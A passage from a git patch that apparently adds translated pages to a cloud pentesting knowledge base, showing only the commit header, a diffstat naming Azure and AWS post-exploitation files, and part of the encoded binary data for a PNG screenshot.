From c33e400bb4d30f383e24d6c0453fdd8e270a00c0 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Sun, 5 Jan 2025 22:58:22 +0000
Subject: [PATCH] Translated
 ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

---
 src/images/azure_static_password.png          | Bin 0 -> 14369 bytes
 .../aws-sagemaker-privesc.md                  |  18 +-
 .../az-static-web-apps-post-exploitation.md   | 162 ++++++++++++++++++
 ...-conditional-access-policies-mfa-bypass.md |  24 +--
 .../az-services/az-static-web-apps.md         | 109 ++++++++++++
 5 files changed, 292 insertions(+), 21 deletions(-)
 create mode 100644 src/images/azure_static_password.png
 create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
 create mode 100644 src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md

diff --git a/src/images/azure_static_password.png b/src/images/azure_static_password.png
new file mode 100644
index 0000000000000000000000000000000000000000..9b11425160fdf4e9366904aff148498194333728
GIT binary patch
literal 14369
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
